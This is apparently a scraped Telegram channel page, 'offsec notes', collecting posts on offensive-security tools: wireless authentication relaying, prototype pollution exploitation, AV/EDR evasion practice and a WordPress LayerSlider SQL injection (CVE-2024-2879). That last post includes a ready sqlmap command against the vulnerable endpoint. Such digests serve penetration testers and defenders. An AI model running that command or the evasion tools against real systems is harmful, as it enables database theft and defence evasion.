fa
Feedback
offsec notes

offsec notes

رفتن به کانال در Telegram
223
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
+230 روز
آرشیو پست ها
WPA_Sycophant A tool to relay phase 2 authentication attempts to access corporate wireless without cracking the password. #wifi

Kaspersky default exception

Prototype pollution Utils
* PPScan - Client Side Protype pollution Scanner * fingerprint.js - script for finding gadgets * untrusted-types - Chrome extension that abuses Trusted Types to log DOMXSS sinks * pollute.js - simple tool to make it easier to exploit prototype pollution
List of known gadget
* Link - examples of libraries that are vulnerable to Prototype Pollution * Link - payloads for known libraries

Repost from Threat Hunt
#maldev #redteam Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков. 1. Собираем проект ./compile.sh 2. Создаём файл ioc.json с паттернами шелл-кода 3. Запускаем инструмент, указываем идентификатор вредоносного процесса: .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234 https://github.com/Helixo32/CrimsonEDR

Repost from Proxy Bar
CVE-2024-2879 LayerSlider плагин для WordPress * Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection * Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных. * POC usage: sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T #wordpress

Утилиты для проведения CIS docker / kubernetes Benchmark'ов * docker-bench-security * kube-bench